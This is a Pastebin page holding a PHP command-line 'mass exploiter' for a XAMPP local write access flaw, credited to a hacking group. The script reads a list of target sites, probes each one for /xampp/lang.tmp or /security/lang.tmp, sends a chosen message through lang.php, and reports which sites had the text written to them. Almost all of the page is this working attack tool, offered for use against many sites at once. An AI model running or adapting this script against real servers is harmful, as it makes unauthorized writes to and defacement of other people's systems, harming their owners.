SHARE
TWEET

[CLI] Mass Exploiter XAMPP Local Write Access

choirurrizal Dec 15th, 2017 (edited) 535 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. # ShinChan - N45HT - N45HT.WEB.ID
  4. # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  5. # shinchan0x1945@gmail.com
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9.  
  10. ##########################################################
  11. # Terimakasih kepada semua teman teman yang membantu membuat Exploiter ini
  12. # Exloiter ini mungkin tidak 100% work, soalnya bot njay
  13.  
  14. # Special thanks : PETR03X - Comod0x - Grav3 - FRU_403
  15.                    SCYTHE404_LOL - All Members N45HT
  16. ##########################################################
  17.  
  18. # note : jangan hapus copyright, hargai pembuat
  19.  
  20.  
  21.  
  22. # coded by ShinChan - N45HT | 15/12/2017
  23. */
  24. echo "
  25.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  26. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  27. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  28. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  29.   XAMPP Local Write Access Auto Exploiter - coded by ShinChan
  30.  
  31.  Thanks to :  PETR03X - Mr.x0x - SCYTHE404_LOL - ./Mr.Blank007
  32.                        All Members N45HT
  33.  
  34.  
  35. ";
  36.  
  37. echo "Input your target list: ";
  38. $list = trim(fgets(STDIN));
  39. echo "Input your quote : ";
  40. $quote0 = htmlspecialchars(str_replace(" ","_",(trim(fgets(STDIN)))));
  41. $quote1 = str_replace(">","_",$quote0);
  42. $quote2 = str_replace("<","_",$quote1);
  43. $quote3 = str_replace("&gt;","_",$quote2);
  44. $pwn = str_replace("&lt;","_",$quote3);
  45.  
  46. $open = fopen("$list","r");
  47. $size = filesize("$list");
  48. $read = fread($open,$size);
  49. $lists = explode("\r\n",$read);
  50.  
  51. echo "\n";
  52.  
  53. foreach($lists as $target){
  54.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  55.         $targets = "http://$target";
  56.     }else{
  57.         $targets = $target;
  58.     }
  59.    
  60.     echo "Target => $targets\n";
  61.     echo "  [*] Checking Path : ";
  62.    
  63.     $chx = curl_init("$targets/xampp/lang.tmp");
  64.     curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
  65.     curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
  66.     curl_exec($chx);
  67.     $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
  68.     curl_close($chx);
  69.                    
  70.     $chs = curl_init("$targets/security/lang.tmp");
  71.     curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  72.     curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  73.     curl_exec($chs);
  74.     $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
  75.     curl_close($chs);
  76.  
  77.     if($httpcodex == 200){
  78.         echo "/xampp/lang.tmp => OK\n";
  79.         echo "  [*] Exploiting Target : ";
  80.         $ck = curl_init("$targets/xampp/lang.php?$pwn");
  81.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  82.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  83.         $cka = curl_exec($ck);
  84.         if($cka){
  85.             echo "OK\n";
  86.             echo "  [*] Result : ";
  87.             $ch = curl_init("$targets/xampp/lang.tmp");
  88.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  89.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  90.             $cek = curl_exec($ch);
  91.             if(preg_match("/$pwn/",$cek)){
  92.                 echo "$targets/xampp/lang.tmp\n\n";
  93.             }else{
  94.                 echo "$targets/xampp/lang.tmp\n\n";
  95.             }
  96.             curl_close($ch);
  97.         }else{
  98.             echo "Failed\n\n";
  99.         }
  100.     }else if($httpcodes == 200){
  101.         echo "/security/lang.tmp => OK\n";
  102.         echo "  [*] Exploiting Target : ";
  103.         $ck = curl_init("$targets/security/lang.php?$pwn");
  104.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  105.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  106.         $cka = curl_exec($ck);
  107.         if($cka){
  108.             echo "OK\n";
  109.             echo "  [*] Result : ";
  110.             $ch = curl_init("$targets/security/lang.tmp");
  111.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  112.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  113.             $cek = curl_exec($ch);
  114.             if(preg_match("/$pwn/",$cek)){
  115.                 echo "$targets/security/lang.tmp\n\n";
  116.             }else{
  117.                 echo "$targets/security/lang.tmp\n\n";
  118.             }
  119.             curl_close($ch);
  120.         }else{
  121.             echo "Failed\n";
  122.         }
  123.     }else{
  124.         echo "Not Vuln\n\n";
  125.     }
  126. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top